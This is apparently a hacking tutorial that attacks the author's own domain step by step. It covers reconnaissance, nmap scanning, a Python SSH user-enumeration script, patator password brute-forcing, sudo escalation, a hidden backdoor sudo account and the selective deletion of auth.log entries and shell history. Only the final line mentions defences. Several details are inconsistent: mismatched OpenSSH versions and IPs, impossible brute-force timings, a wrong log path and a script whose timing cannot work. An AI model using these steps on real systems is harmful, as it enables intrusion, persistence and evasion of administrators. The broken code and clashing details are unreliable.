Untitled

A hacker can get his feet into a network via different techniques, and for different reasons. A network can be targeted from a hacker for what ever reason he has and in this case it will be a target of choice, or it could be just a target of opporunity as he found it by a random scan.
-“If a network is not  a target of choice it doesn't mean that it is safe, because its just a matter of time till it will become a target of opportunity.”-

Usually hackers will go in these well known steps to gain access over a network,

1- Reconnaissance and Foot / Finger printing:- Mainly reconnaissance is the first step of an attack and this phase is mostly about Information gathering. All information that the hacker can gather about the victim even if it seems simple and useless. The hacker can collect this information via different ways, for example,simple dumpster diving around the target's office, checking their staff social network profiles, googling the target and note the information he will got or via Social engineering. The Foot printing process will come after to complete the step. Foot printing is mainly to study the network, for example, how devices are connected together, how many device the network have, infra structure, firewalls, etc.
“This phase depend on OSINT -Open source intelligence- with no direct contact with the target”

2-  Scanning:- The attacker will engage within the target for more specific details, for example open ports and running services, lets say we got port 22 open then by a simple telnet command we can figure the SSH version running in the server.

3- Enumeration, gaining access and privileges escalation:-  Three different processes, firstly Enumeration which will allow the hacker to know the valid accounts that he wants to obtain access for via active connection, for example he knows for the above processes -Reconnaissance, foot printing and scanning- that there is a SSH service running on -default- port 22, via enumerating the hacker can know if a user is valid or not via simple python script. Next step will be reinforcing the valid account. If he succeed to gain an access to the SSH server, then he will try do privileges escalation, if the brute-forced account doesn't have super user power.

4- Creating a backdoor and covering tracks:- In this phase the hacker already gained access and he will install a rootkit, backdoor so he guarantee him self a free entrance to the network later on, for example, creating a new user and adding it to the sudo list. Last step will be covering the tracks by updating the logs via deleting his tracks from it.
A hacker will never delete the logs, as it will get the network administrator attention.


The above section was a short description in how a hacker can get into a network. The following section will be a real life example to break into a network.


                                     		        A real life example,

Let's say a hacker would like to takeover ashellz.com -It's owned by me- I will try to demonstrate the process step by step according to the above explanation.

Reconnaissance and Foot  printing:-

 Google the target domain ashellz.com


 Whois the target domain.


root@Mox:/home/allamoox# whois ashellz.com
Registrant domain : Goddady.com
Tech Email: allamoox@hotmail.com
Name Server: NS8015.HOSTGATOR.COM
Name Server: NS8016.HOSTGATOR.COM
Tech Name: mahmoud allam
Tech Organization: aLLamoox
Tech Street: aol tarik shobar
Tech City: Tanta
Tech State/Province: gHARBIA
Tech Postal Code: 31111
Tech Country: EG
Tech Phone: +20.104691184

Dig the target domain.
root@Mox:/home/allamoox# dig ashellz.com any -Using dig with the switch any , to show all records.-

ashellz.com.		14385	IN	A	192.185.16.67
ashellz.com.		86385	IN	SOA	ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
ashellz.com.		14385	IN	MX	0 mail.ashellz.com.
ashellz.com.		14385	IN	TXT	"v=spf1 a mx include:websitewelcome.com ~all"
ashellz.com.		86385	IN	NS	ns8016.hostgator.com.
ashellz.com.		86385	IN	NS	ns8015.hostgator.com

			    These processes can be considered as “passive scan”
Scanning:-

Will use nmap with switches O to detect the OS and sS so the connection close before completing the three way handshake.

root@Mox:/home/allamoox# nmap -O -sS ashellz.com
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
25/tcp   filtered smtp
26/tcp   open     rsftp
53/tcp   open     domain
80/tcp   open     http
110/tcp  open     pop3
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  open     imap
443/tcp  open     https
445/tcp  filtered microsoft-ds
465/tcp  open     smtps
587/tcp  open     submission
993/tcp  open     imaps
995/tcp  open     pop3s
2222/tcp open     EtherNetIP-1
3306/tcp open     mysql
8080/tcp open     http-proxy
8443/tcp open     https-alt
Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux 2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%) .

root@Mox:/home/allamoox# telnet private.ashellz.com 22
Trying 158.69.197.45...
Connected to private.ashellz.com.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2

By a simple search about “OpenSSH_6.0p1 Debian-4+deb7u6 ” hacker will know that It's vulnerable to user enumerating..
These processes can be considered as active scan

Enumeration:-
The hacker at this point have a good idea about the target, and which parts are vulnerable and he will start enumerating valid accounts for the SSH service via timing attack technique.

The technique here depend in the time that our server take to authenticate a user, so we will use a 10kb password to which means if the user doesn't exist then we will get answer from the server faster than an existing user.

The hacker will use this simple python script to enumerate valid users.

#Including the paramiko library
import paramiko
 #Including the time library
import time
#Asking for the required username to be checked
user=raw_input("user: ")
#Supplying the Password as the letter A repeated 25000 times
p='A'*25000 	-define password as letter A repeated 25000 times-
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:

#Opening a SSH connection with the ashellz.com server with the user that we will chose and a 25000 letter password
        ssh.connect('192.185.16.67', username=user,
        password=p)
#Giving the taken time to authenticate an user
except:
        endtime=time.clock()
total=endtime-starttime
print(total)”
python code.py
Now we get a few valid accounts such as (root, allamoox, allam, test).
|Gaining access


Using patator -Python script used for brute forcing a lot of services like FTP, SSH, etc.- against these users list.
allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/user.txt 0=/home/allamoox/easy_guess.txt -x ignore:mesg='Authentication failed.'
17:45:12 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
17:45:12 patator    INFO -
17:45:12 patator    INFO - code  size   time | candidate                          |   num | mesg
17:45:12 patator    INFO - -----------------------------------------------------------------------------
17:51:22 patator    INFO - 0     37    0.204 | test123:test                       |  1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
17:51:33 patator    INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 0h 1m 2s

The hacker get  two accounts in just few minutes because of weak passwords.

privileges escalation
Now the hacker get a valid accounts he will check if it is in the sudo list or not via running any command as a super user
test@aShellz:/home/allamoox$ sudo uptime
[sudo] password for test:
test is not in the sudoers file.  This incident will be reported.
test@aShellz:/home/allamoox$ .

It isn't super user but still its very useful account. The hacker will try to list all the users in the server via this command
test@aShellz:/home/allamoox$ cat /etc/group
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:allamoox,xenthys,jack3
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
netdev:x:101:
input:x:102:
systemd-journal:x:103:
systemd-timesync:x:104:
systemd-network:x:105:
systemd-resolve:x:106:
systemd-bus-proxy:x:107:
ssh:x:108:
messagebus:x:109:

Now the hacker will try to hack any of these accounts (sudo:x:27:allamoox,xenthys,jack3) and he will own the server. Again he will try to brute force it via patator but with a bit complicated wordlist.

allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0 1=/home/allamoox/20_million_password_list_top_2000000.txt -x ignore:mesg='Authentication failed.'
17:45:12 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24 17:45 CEST
17:45:12 patator    INFO -
17:45:12 patator    INFO - code  size   time | candidate                          |   num | mesg
17:45:12 patator    INFO - -----------------------------------------------------------------------------
17:51:22 patator    INFO - 0     37    0.204 | qazxswedc123:jack3                     |  1308 | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
17:51:33 patator    INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 21h 1m 49s.

As we can see “jack3” used a pattern password, and it was included in a huge word list, so his account get hacked. The hacker will log as root now.

jack3@aShellz:/home/jack3$ sudo su
[sudo] password for jack3:
root@aShellz:/home/jack3#

He will add another account and put it in the superusers list,  to guarantee himself a free entrance into the server in the future and will use a name like system.
root@aShellz:/home/allamoox# adduser system

Adding the user to sudo group

root@aShellz:/home/allamoox# usermod -G sudo system
root@aShellz:/home/allamoox# cat /etc/group |grep sudo
sudo:x:27:jack3,xenthys,allamoox,system

Then the hacker will clear his tracks from the log.

To know how many lines, words or characters in the log file.
root@aShellz:/home# wc /var/logs/auth.log
  200601  2731431 21813737 logs.txt
more than 200k lines

the hack will open the file to delete only his tracks from the log, for example lines as the following

root@aShellz:/home# nano /var/logs/auth.log

Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 81.229. port 35784 ssh2

Sep 25 11:14:43 vps1670 passwd[1891]: pam_unix(passwd:chauthtok): password changed for jack3
Sep 24 21:50:26 vps1670 groupadd[1948]: group added to /etc/group: name=system, GID=1027
For sure there are many lines the hacker need to delete, he might use “awk” or “sed” command to delete any line that start with the word failed password under this date Sep 24.

Last thing the hacker will do is to clear his commands from  the history command as well.

P.S: The hacker can use completely different scenarios depending on the situation.

A solution could be, a good enforced security policy, and a program like “Fail2ban” to block any brute force attempt, with a decent activated firewall.